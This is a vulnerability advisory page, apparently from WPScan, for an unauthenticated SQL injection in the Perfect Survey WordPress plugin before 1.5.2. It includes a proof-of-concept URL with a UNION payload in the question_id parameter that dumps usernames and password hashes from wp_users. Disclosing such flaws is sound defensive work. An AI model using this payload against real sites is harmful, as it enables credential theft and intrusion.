How it works Pricing

Vulnerabilities

WordPress Plugins Themes Stats Submit vulnerabilities

For developers

Status API details CLI scanner

WordPress Plugin Vulnerabilities

Perfect Survey < 1.5.2 - Unauthenticated SQL Injection

Description

The plugin does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.

Proof of Concept

(The question_id must start with an existing post ID) https://example.com/wp-admin/admin-ajax.php?action=get_question&question_id=1%20union%20select%201%2C1%2Cchar(116%2C101%2C120%2C116)%2Cuser_login%2Cuser_pass%2C0%2C0%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%20from%20wp_users

Affects Plugins

Fixed in version 1.5.2 - plugin closed

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

c1620905-7c31-4e62-80f5-1d9635be11ad

Timeline

Publicly Published

2021-10-05 (about 11 months ago)

Added

2021-12-29 (about 9 months ago)

Last Updated

2022-04-13 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin